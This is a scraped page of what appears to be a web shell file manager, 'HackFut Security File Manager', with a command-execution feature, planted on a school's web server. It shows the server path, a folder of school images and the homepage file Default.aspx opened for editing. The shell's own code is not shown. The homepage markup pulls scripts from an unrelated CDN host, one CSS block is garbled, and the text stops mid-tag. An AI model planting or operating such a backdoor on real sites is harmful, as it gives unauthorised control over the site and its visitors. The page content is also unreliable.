HackFut Security File Manager
Current Path:
D:\Inetpub\vhosts\rahulinternationalschool.com\httpdocs\img
Command Execution
D:
/
Inetpub
/
vhosts
/
rahulinternationalschool.com
/
httpdocs
/
img
/
π
..
π
Default.aspx
(51.9 KB)
π
Facilities.png
(1.11 MB)
π
IMG-20250711-WA0061.jpg
(178.76 KB)
π
IMG-20250711-WA0062.jpg
(212.17 KB)
π
IMG-20250711-WA0063.jpg
(69.38 KB)
π
IMG-20250711-WA0064.jpg
(96.01 KB)
π
IMG_20250711_094259.jpg
(7.35 MB)
π
IMG_20250711_094323.jpg
(2.5 MB)
π
IMG_20250711_094439.jpg
(7.11 MB)
π
IMG_20250711_094510.jpg
(3.25 MB)
π
Library.png
(646.1 KB)
π
Misison.png
(382.94 KB)
π
New folder
π
School Pics-20250711T053505Z-1-001
π
School Pics-20250711T053505Z-1-001.zip
(6.07 MB)
π
Sports.png
(380.65 KB)
π
act.jpg
(50.69 KB)
π
basketball.jpg
(169.73 KB)
π
bio.jpg
(102.66 KB)
π
building.jpg
(102.2 KB)
π
building1.jpg
(81.28 KB)
π
building2.jpg
(92.8 KB)
π
chairman original.jpg
(8.96 MB)
π
chairman.jpg
(3.31 MB)
π
chairman1.jpeg
(36.94 KB)
π
chem.jpg
(67.59 KB)
π
comp.jpeg
(127.67 KB)
π
comp.jpg
(233.62 KB)
π
conf.jpg
(633.28 KB)
π
cop_lab.jpg
(154.21 KB)
π
cul.jpg
(140.47 KB)
π
director.jpeg
(24.1 KB)
π
exam.jpg
(103.38 KB)
π
icons
π
lawnT.jpg
(366.22 KB)
π
lib.jpg
(6.32 MB)
π
logo.jpg
(47.25 KB)
π
logo.png
(116.33 KB)
π
main-logo.png
(114.85 KB)
π
maths.jpg
(94.2 KB)
π
md1.jpg
(2.13 MB)
π
md2.jpg
(7.72 MB)
π
p1.png
(6.69 MB)
π
p2.jpg
(2.5 MB)
π
pf1.jpg
(1.03 MB)
π
pf1.png
(6.44 MB)
π
pf2.jpg
(3.25 MB)
π
phy.jpg
(943.37 KB)
π
pop-up.jpg
(251.42 KB)
π
pop-up1.jpg
(232.87 KB)
π
principal.jpeg
(40.17 KB)
π
ramp.jpg
(232.62 KB)
π
recep.jpg
(106.17 KB)
π
sch.jpg
(186.83 KB)
π
smart.jpg
(1.07 MB)
π
smartt.jpg
(2.13 MB)
π
stationery.jpg
(27.31 KB)
π
student.jpg
(85.19 KB)
π
swings.jpg
(281.54 KB)
π
teaids.jpeg
(13.1 KB)
π
teaids.jpg
(27.38 KB)
π
transport.jpg
(424.09 KB)
π
vallyball.jpg
(259.79 KB)
Editing: Default.aspx
ο»Ώ<%@ Page Title="" Language="C#" MasterPageFile="~/MasterPage.master" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="_Default" %> <asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"> <script type="text/javascript" src="x4w2z7a9.rocketcdn.me/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" ></script> <script type="text/javascript" src="x4w2z7a9.rocketcdn.me/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="x4w2z7a9.rocketcdn.me/wp-content/cache/min/1/wp-content/plugins/cf7-redirect-thank-you-page/assets/js/redirect_method.js?ver=1700657289" id="cf7rl-redirect_method-js" defer></script> <script type="text/javascript" src="x4w2z7a9.rocketcdn.me/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.14.1" id="font-awesome-4-shim-js" defer></script> <script type="text/javascript" src="x4w2z7a9.rocketcdn.me/wp-content/cache/min/1/wp-content/plugins/elementskit/modules/parallax/assets/js/jarallax.js?ver=1700657289" id="jarallax-js" defer></script> <script>function setREVStartSize(e){ //window.requestAnimationFrame(function() { window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW; window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH; try { var pw = document.getElementById(e.c).parentNode.offsetWidth, newh; pw = pw===0 || isNaN(pw) || (e.l=="fullwidth" || e.layout=="fullwidth") ? window.RSIW : pw; e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw); e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw); e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh); e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh); e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide); e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide); e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0); if(e.layout==="fullscreen" || e.l==="fullscreen") newh = Math.max(e.mh,window.RSIH); else{ e.gw = Array.isArray(e.gw) ? e.gw : [e.gw]; for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1]; e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el; e.gh = Array.isArray(e.gh) ? e.gh : [e.gh]; for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1]; var nl = new Array(e.rl.length), ix = 0, sl; e.tabw = e.tabhide>=pw ? 0 : e.tabw; e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw; e.tabh = e.tabhide>=pw ? 0 : e.tabh; e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh; for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i]; sl = nl[0]; for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;} var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]); newh = (e.gh[ix] * m) + (e.tabh + e.thumbh); } var el = document.getElementById(e.c); if (el!==null && el) el.style.height = newh+"px"; el = document.getElementById(e.c+"_wrapper"); if (el!==null && el) { el.style.height = newh+"px"; el.style.display = "block"; } } catch(e){ console.log("Failure at Presize of Slider:" + e) } //}); };</script> <style type="text/css"> .buttonizer.buttonizer-group.buttonizer-group-0-0-1 { rotate: 270deg !important; } .facebook { background-color: #145380; font-size: 22px; color: #fff; padding: 3px 18px; position: fixed; z-index: 99999; top: 40%; } .youtube:hover, .whatsapp:hover, .instagram:hover, .facebook:hover { color: #fff; } .flex-sh { position: fixed; z-index: 99999; display: grid; background-color: #fff; top: 40%; padding: 6px 7px; } .flex-sh a img { width: 40px; height: 40px; padding: 3px; margin-bottom: 0px; margin-top: 0px; } .flex-sh a { border-bottom: 1px solid grey; padding-bottom: 3px; padding-top: 2px; } @media screen and (max-width:900px) { .eael-testimonial-content { display:none } } </style> <div class="flex-sh"> <a href="#" target="_blank"> <img src="img/icons/Facebook.png" /> </a> <a href="#" target="_blank"> <img src="img/icons/instagram.png" /> </a> <a href="https://wa.me/9568907600 " target="_blank"> <img src="img/icons/whatsapp.png" /> </a> <a href="#" target="_blank"> <img src="img/icons/youtube.png" /> </a> </div> <link href="owl/owl.carousel.min.css" rel="stylesheet" /> <link href="owl/owl.theme.default.min.css" rel="stylesheet" /> <script src="owl/owl.carousel.min.js"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"> <style> #overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: #000; filter: alpha(opacity=70); -moz-opacity: 0.7; -khtml-opacity: 0.7; opacity: 0.7; z-index: 100; display: none; } .cnt223 a { text-decoration: none; } .popup { width: 100%; margin: 0 auto; display: none; position: fixed; z-index: 99999999; height: 100%; text-align: center; top: 0; background-color: #000000c7; display:none; } .cnt223 { display: inline-block; min-height: 150px; margin: 80px auto; background: #00000026; position: relative; z-index: 103; padding: 1px 0; border-radius: 5px; box-shadow: 0 2px 5px #000000; position: relative; max-width: 500px; width: 85%; } .cnt223 p { clear: both; color: #000000; text-align: center; font-size: 20px; font-family: initial; } .cnt223 p a { margin-top: -127px; color: #fff; font-weight: bold; margin-right: -16px; } .cnt223 .x { float: right; height: 35px; left: 22px; position: relative; top: -25px; width: 34px; } .cnt223 .x:hover { cursor: pointer; } .cnt223 h4 { font-size: 2.5rem; margin-top: 20px; font-family: math; } .cnt223 p .qq { background: #d80910; color: #fff; padding: 11px 18px; border-radius: 45px; box-shadow: 0 0 11px black; border: 0.5px solid white; } .cnt223 p .qq:hover { text-decoration: none; } .close { float: right; font-size: 20px; font-weight: 700; line-height: 1; color: #000; text-shadow: 0 1px 0 #fff; opacity: 1; position: absolute; top: -10px; right: -18px; } @media screen and (max-width:786px) { .cnt223 p a { margin-top: -155px; color: #fff; font-weight: bold; margin-right: -16px; } .cnt223 h4 { font-size: 30px; } .h6, h6 { font-size: 15px; } .tittle { font-size: 18px; letter-spacing: 1px; color: #292a2b; font-weight: 800; } .cnt223 { min-width: 55%; min-height: 260px; margin: 160px auto; top: -33px; } } .close { color: #fff; } </style> <div class="popup" style="display: none;"> <div class="cnt223" style="text-align:center;"> <a href="admissionprocedure.aspx"> <img src="img/pop-up.jpg" style="width:125%;height:150%" /> </a> <a href="#" class="close" style="color:#fff;"> X</a> </div> </div> <script > $(function () { var overlay = $('<div id="overlay"></div>'); overlay.show(); overlay.appendTo(document.body); $('.popup').show(); $('.close').click(function () { $('.popup').hide(); overlay.appendTo(document.body).remove(); return false; }); $('.x').click(function () { $('.popup').hide(); overlay.appendTo(document.body).remove(); return false; }); }); </script> <style> @media screen and (max-width: 600px) { .sliderimg { height: 25vh; width: 100%; } } </style> <div class="owl-carousel owl-theme"> <div class="item"> <img src="img/building.jpg" class="sliderimg"/> </div> <div class="item"> <img src="img/building.jpg" class="sliderimg"/> </div> </div> <!--lates news--> <style> .about-img { margin-top: 70px; width: 100%; height: 100%; padding: 7px; border: 1px solid #7e7e7e; box-shadow: 0px 1px 5px grey; } </style> <!--about us--> <style> .highlight-1 { padding-top: 40px; padding-bottom: 50px; } .highlight-1 h2 { font-size: 30px; z-index: 9; position: relative; padding: 8px; background-color:#040460; text-align: center; color: #fff; font-family: "Times",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; padding-bottom: 7px; font-weight: 500; } .highlight-1 .high a img { margin-top: -10px; margin-bottom: 15px; width: 100%; height: 220px; overflow: hidden; transition-duration: 0.5s; border-radius: 0%; box-shadow: 0px 5px 15px 0px rgb(0 0 0 / 50%); } .highlight-1 .high a img:hover { transform: translateY(-12px); } @media screen and (max-width:786px) { .highlight-1 .high a img { margin-top: 15px; margin-bottom: 15px; width: 100%; height: auto; overflow: hidden; transition-duration: 0.5s; border-radius: 50%; box-shadow: 0px 5px 15px 0px rgb(0 0 0 / 50%); } .highlight-1 { padding-top: 30px; padding-bottom: 20px; } } </style> <section> <div class="container "> <div class="row highlight-1"> <div class="col-md-12"> <h2> HIGHLIGHTS </h2> </div> <div class="col-md-3 col-6"> <div class="high"> <a href="mission-vision.aspx"> <img src="img/Misison.png" /> </a> </div> </div> <div class="col-md-3 col-6"> <div class="high"> <a href="facilities.aspx"> <img src="img/Facilities.png" /> </a> </div> </div> <div class="col-md-3 col-6"> <div class="high"> <a href="facilities.aspx"> <img src="img/Library.png" /> </a> </div> </div> <div class="col-md-3 col-6"> <div class="high"> <a href="facilities.aspx"> <img src="img/Sports.png" /> </a> </div> </div> </div> </div> </section> <!-- message block--> <!-- message block--> <link href="x4w2z7a9.rocketcdn.me/wp-content/plugins/elementor-pro/assets/css/widget-carousel.min.css" rel="stylesheet" /> <link href="x4w2z7a9.rocketcdn.me/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min48f5.css" rel="stylesheet" /> <script src="x4w2z7a9.rocketcdn.me/wp-content/plugins/elementor/assets/lib/swiper/swiper.min5b0a.js"></script> <script src="x4w2z7a9.rocketcdn.me/wp-content/plugins/events-calendar-pro/vendor/swiper/dist/js/swiper.min42c6.js"></script> <script type="text/javascript"> /* <![CDATA[ */ var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.14.1","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"e_font_icon_svg":true,"a11y_improvements":true,"theme_builder_v2":true,"landing-pages":true,"e_lazyload":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"https:\/\/www.dwpsnoidaex.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper-container","settings":{"page":[],"editorPreferences":[]},"kit":{"body_background_background":"classic","active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","vamtam_theme_has_theme_cursor":"yes"},"post":{"id":987845,"title":"Best%20Schools%20in%20Noida%20Extension%20%7C%20DWPS","excerpt":"","featuredImage":"https:\/\/www.dwpsnoidaex.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-29-at-1.35.59-PM-576x1024.webp"}}; /* ]]> */ </script> <div id="page" class="main-container"> <div id="main-content"> <div id="main" role="main" class="vamtam-main layout-full" > <div class="page-wrapper"> <article id="post-987845" class="full post-987845 page type-page status-publish has-post-thumbnail hentry"> <div class="page-content clearfix the-content-parent"> <div data-elementor-type="wp-page" data-elementor-id="987845" class="elementor elementor-987845" data-elementor-post-type="page"> <section data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-section elementor-top-section elementor-element elementor-element-dad5ce8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="dad5ce8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4e819bd" data-id="4e819bd" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-719f7dd elementor-widget elementor-widget-eael-testimonial-slider" data-id="719f7dd" data-element_type="widget" data-settings="{"ekit_we_effect_on":"none"}" data-widget_type="eael-testimonial-slider.default"> <div class="elementor-widget-container"> <div class="swiper-container-wrap swiper-container-wrap-dots-outside eael-testimonial-slider icon-img-left-content" id="eael-testimonial-719f7dd"> <div class="swiper-container eael-testimonial-slider-main swiper-container-719f7dd" data-pagination=".swiper-pagination-719f7dd" data-arrow-next=".swiper-button-next-719f7dd" data-arrow-prev=".swiper-button-prev-719f7dd" data-effect="cube" data-speed="1000" data-loop="1" data-dots="1" data-autoplay_speed="3000" data-pause-on-hover="true"> <div class="swiper-wrapper"> <div class="eael-testimonial-item clearfix swiper-slide eael-testimonial-align-left"> <div class="eael-testimonial-item-inner clearfix"> <div class="eael-testimonial-image"> <figure> <img width="1024" height="683" src="img/chairman.jpeg"/> </figure> </div> <div class="eael-testimonial-content " style="height:auto;"> <span class="eael-testimonial-quote"></span> <div class="eael-testimonial-text "> <p> <strong>MESSAGE FROM THE CHAIRMAN'S DESK</strong> </p> <p> A caring, supportive, dedicated and well motivated RIS trained team, to encourage spiritual, personal and academic development of its students, coming from a variety of cultural and social backgrounds can feel secure and equally valued. <br /> You are welcome to RIS Dhamora. </p> </div> <p class="eael-testimonial-user">Ramesh Chandra Agarwal </p><br /> <p class="eael-testimonial-user-company">CHAIRMAN</p> </div> </div> </div> <div class="eael-testimonial-item clearfix swiper-slide eael-testimonial-align-left"> <div class="eael-testimonial-item-inner clearfix"> <div class="eael-testimonial-image"> <figure> <img width="1024" height="683" src="img/director.jpeg" /> </figure> </div> <div class="eael-testimonial-content " style="height: auto;"> <span class="eael-testimonial-quote"></span> <div class="eael-testimonial-text "> <p> <strong>MESSAGE FROM THE DIRECTOR DESK</strong> </p> <p> Rahul International School aspires all students to succeed in their world. It offers a wide variety of challenging, enjoyable and successful curricular opportunities, athletic programmes, performing arts and musical programmes with various clubs and activities. </p> </div> <p class="eael-testimonial-user">Mr. Nandan Agarwal Director </p> <br /> <p class="eael-testimonial-user-company">DIRECTOR</p> </div> </div> </div> <div class="eael-testimonial-item clearfix swiper-slide eael-testimonial-align-left"> <div class="eael-testimonial-item-inner clearfix"> <div class="eael-testimonial-image"> <figure> <img width="1024" height="683" src="img/principal.jpeg" /> </figure> </div> <div class="eael-testimonial-content " style="height: auto;"> <span class="eael-testimonial-quote"></span> <div class="eael-testimonial-text "> <p> <strong>MESSAGE FROM THE PRINCIPAL DESK</strong> </p> <p> Education is the promise of progress, in every society, in every family. All men by nature desire to know and only the educated are free. At RIS, Dhamora we intend to develop a passion for learning. We are committed to impart quality education which builds character plus intelligence. </p> </div> <p class="eael-testimonial-user">MS. GURPREET KAUR</p> <br /> <p class="eael-testimonial-user-company">PRINCIPAL</p> </div> </div> </div> </div> <div class="swiper-pagination swiper-pagination-719f7dd"></div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </article> </div> </div> </div> </div> <style> .eael-testimonial-image { width: 35%!important; } .eael-testimonial-content { width: 65%!important; } @media screen and (max-width:786px) { .eael-testimonial-image { width: 100%!important; } .eael-testimonial-content { width: 100%!important; } } </style> <script type='text/javascript'> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <script type='text/javascript'> const lazyloadRunObserver = () => { const dataAttribute = 'data-e-bg-lazyload'; const lazyloadBackgrounds = document.querySelectorAll( `[${ dataAttribute }]:not(.lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; const lazyloadSelector = lazyloadBackground.getAttribute( dataAttribute ); if ( lazyloadSelector ) { lazyloadBackground = entry.target.querySelector( lazyloadSelector ); } if( lazyloadBackground ) { lazyloadBackground.classList.add( 'lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '100px 0px 100px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script> <!--why choose us--> <style> .why-choose-us { position: relative; background-image: url(img/building.jpg); background-position: center; background-repeat: no-repeat; background-size: 100%; } .why-choose-us .overlay { width: 100%; position: absolute; background-color: transparent; background-image: linear-gradient(239deg, #000000 0%, #500100 100%); opacity: 0.85; transition: background 0.3s, border-radius 0.3s, opacity 0.3s; height: 100%; } .why-block h2 { color: #fff; font-size: 29px; font-weight: 500; font-family: 'FontAwesome'; } .why-block { padding-top: 50px; padding-bottom: 60px; } .why-block h3 { color: #fff; font-size: 30px; font-family: initial; } .why-block p { color: #fff; font-size: 17px!important; line-height: 30px; } .why-block p a { color: #fff; font-family: cursive; font-size: 17px; text-decoration: underline!important; } .why-block .admission h2 { text-align: center; font-family: 'FontAwesome'; color: #fff; font-size: 37px!important; padding: 20px; } .wy-block .admission .a-block { width: 100%; padding: 20px; background-color: #fff; } .why-block .admission .admission-ul { display: flex; color: #fff; list-style: none; justify-content: center; margin-bottom: 0; } .why-block .admission .admission-ul li { margin-right: 10px; margin-left: 20px; } .why-block .admission .admission-ul li a { color: #000; font-size: 17px; font-family: 'FotAwesome'; } .image-block-why { height: 280px; border-radius: 13px; width: 100%; box-shadow: 3px 3px 10px #000; } .a-block { background-color: #fff; padding: 20px; } @media screen and (max-width:786px) { .why-block .admission .admission-ul { display: block; color: #fff; list-style: none; justify-content: center; margin-bottom: 0; line-height: 40px; } } </style> <section class="why-choose-us"> <div class="overlay"></div> <div class="container why-block"> <div class="row"> <div class="col-md-8"> <h3>WHY RAHUL INTERNATIONAL SCHOOL IS AMONGST THE BEST SCHOOL ?</h3> <p> The Schoolβs prime goal is the development of all- round personality of student. The primary thrust of the School is to undertake pioneering scholarly activities for students, to expand their horizons, by providing much needed quality education to the young citizens. Distinction and diversity are the twin hallmarks of RIS philosophy, educational leadership and scholarly achievement will be itβs mission. </p> <p><a href="about.aspx">Read More</a></p> </div> <div class="col-md-4"> <img src="img/building.jpg" class="image-block-why"/> </div> <div class="col-md-12 admission"> <h2 >Admissions Open 2024-25</h2> <div class="a-block"> <ul class="admission-ul"> <li><a href="admissionprocedure.aspx"> ADMISSION PROCESS</a></li> <li><a href="fees-structure.aspx"> FEE STRUCTURE</a></li> <li><a href="downloads.aspx" target="_blank"> DOWNLOAD BROUCHURE</a></li> <li><a href="contactus.aspx"> INQUIRE NOW</a></li> </ul> </div> </div> </div> </div> </section> <!--Infra structue--> <style> .nav-pills .nav-link { width: 100%; padding: 10px 8px!important; font-size: 18px!important; background-color:#040460; border-radius: 0; font-weight: 700; font-family: unset; line-height: 30px; } .nav-pills .nav-link.active, .nav-pills show > .nav-link { color: #000!important; background-color: #F1F1F1; } .eysf-hero-img { width: 100%; height: 250px; border: 1px solid #979797; padding: 6px; box-shadow: 2px 2px 5px #979797; background-color: #fff; } .eyfs-section-wrp h2 { font-family: math; font-size: 32px; font-weight: 600; color: #e31a10; margin-bottom: 15px; text-align: center; padding-bottom: 15px; } .tab-content .eyfs-content h4 { font-weight: 500; font-family: initial; font-size: 26px; color: #000; } </style> <section class="eyfs-section-wrp" style="padding-bottom: 50px; padding-top:50px"> <div class="container"> <div class="col-md-12"> <h2>INFRASTRUCTURE</h2> </div> <div class="row align-items-center" data-aos="fade-up" data-aos-anchor-placement="center-bottom" style="background-color: #F1F1F1;margin-top: 25px;"> <div class="col-md-3" style="padding: 0px;"> <!-- Tabs nav --> <div class="nav flex-md-column align-items-end nav-pills nav-pills-custom mt-sm-0 mt-3 mb-4 mb-md-0" id="v-pills-tab" role="tablist" aria-orientation="vertical" style="position: relative;"> <a class="nav-link text-white position-relative text-center shadow active" id="eyfs-tab" data-toggle="pill" href="#digital-classroom"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">Smart Classes</span></a> <a class="nav-link text-white position-relative text-center shadow" id="primary-tab" data-toggle="pill" href="#laboratory"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">Student Counceling</span></a> <a class="nav-link text-white position-relative text-center shadow" id="secondary-tab" data-toggle="pill" href="#sports"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">Enrichment Resource Centre</span></a> <a class="nav-link text-white position-relative text-center shadow" id="A1" data-toggle="pill" href="#auditorium"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">IT Education</span></a> <a class="nav-link text-white position-relative text-center shadow" id="A2" data-toggle="pill" href="#library"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">Health & Physical Education</span></a> <a class="nav-link text-white position-relative text-center shadow" id="A3" data-toggle="pill" href="#safety"> <span class="small text-uppercase d-block" style="transform: translateY(-5px);">Value Education</span></a> </div> </div> <style> .infra-accordian { display: flex; } @media screen and (max-width:786px) { .infra-accordian { display:block; } } </style> <div class="col-md-9" style="padding: 0px;"> <!-- Tabs content --> <div class="tab-content" id="v-pills-tabContent"> <div class="tab-pane fade shadow show active p-lg-5" id="digital-classroom" role="tabpanel" aria-labelledby="v-pills-home-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" alt="eysf-img" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class=" mb-4">Smart Classes</h4> <p> A smart classroom is a digital classroom which is an advanced form of a school that follows different ways of teaching to improve efficiency. They work towards providing a better environment for learning and prioritize a healthy classroom where the students are interested in learning.<br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> <div class="tab-pane fade shadow p-lg-5" id="laboratory" role="tabpanel" aria-labelledby="primary-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class="fw-500 mb-4">Student Counceling</h4> <p> School counselors offer individual counseling to help students resolve personal or interpersonal problems. They may also offer small group counseling to help students enhance listening and social skills, learn to empathize with others, and find social support through healthy peer relationships.<br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> <div class="tab-pane fade shadow p-lg-5" id="sports" role="tabpanel" aria-labelledby="secondary-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" alt="eysf-img" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class="fw-500 mb-4">Enrichment Resource Centre</h4> <p> The Enrichment Resource Center assists schools in developing programs that are tailored to the specific needs of their students, as well as training to strengthen the differentiation skills of the classroom teachers so they can provide a rich learning experience for all levels of students.<br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> <div class="tab-pane fade shadow p-lg-5" id="auditorium" role="tabpanel" aria-labelledby="secondary-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" alt="eysf-img" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class="fw-500 mb-4">IT Education</h4> <p> Information Technology is a worldwide accepted educational instrument designed to increase the effectiveness and efficiency of the educational system. Computers are mainly used to improve the learning system. Online learning and remote training are among new education forms.<br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> <div class="tab-pane fade shadow p-lg-5" id="library" role="tabpanel" aria-labelledby="secondary-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" alt="eysf-img" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class="fw-500 mb-4">Health & Physical Education</h4> <p> The main objective of school physical education is to promote students' interest in exercises so that they become aware of the health benefits promoted through this practice; besides stimulating cognitive functions that involve attention, logical reasoning, and memory, consequently improving students' school <br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> <div class="tab-pane fade shadow p-lg-5" id="safety" role="tabpanel" aria-labelledby="secondary-tab"> <div class="infra-accordian align-items-center"> <div class="col-md-4" style="position: relative;"> <div class="eyfs-img mb-4 mb-lg-0"> <img src="img/student.jpg" class="eysf-hero-img img-fluid position-relative" alt="eysf-img" width="222"> </div> </div> <div class="col-md-8"> <div class="eyfs-content"> <h4 class="fw-500 mb-4">Value Education</h4> <p> Values education therefore promotes tolerance and understanding above and beyond our political, cultural and religious differences, putting special emphasis on the defence of human rights, the protection of ethnic minorities and the most vulnerable groups, and the conservation of the environment.<br /> <a href="facilities.aspx" style="color: #ff0000;">Read More</a> </p> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!--gallery--> <div class="clearfix"></div> <style> img.galry { widt: 100%; } .ga lery-portion { bakground: ur l (img/stationery.jpg) #fff ! mportant; padding-top 50px; padding-bot t om: 30 x; } </style> <script> $('.owl-carousel').owlCarousel({ loop: true, margin: 0, nav: true, responsive: { 0: { items: 1 }, 600: { items: 1 }, 1000: { items: 1 } } }) </script> <script> $(document).ready(function () { $("#owl-demo").owlCarousel({ autoPlay: 3000, items: 1, loop: true, autoplay: true, autoplayTimeout: 3000, //autoplayHoverPause: true, pagination: false, singleItem: true }); }); </script> <style type='text/css'> img[data-dominant-color]:not(.has-transparency) { background-color: var(--dominant-color); } </style> <link href="wp-content--1/frontend.min.css" rel="stylesheet" /> <link href="wp-content--1/frontend-lite-1.min.css" rel="stylesheet" /> <link href="wp-content--1/frontend-lite.min.css" rel="stylesheet" /> <link href="wp-content--1/main.min.css" rel="stylesheet" /> <link href="wp-content--1/hover.min.css" rel="stylesheet" /> <link href="wp-content--1/justifiedGallery.min.css" rel="stylesheet" /> <link href="wp-content--1/general.min.css" rel="stylesheet" /> <link href="wp-content--1/eael-987845.css" rel="stylesheet" /> <link href="wp-content--1/swiper.min.css" rel="stylesheet" /> <link 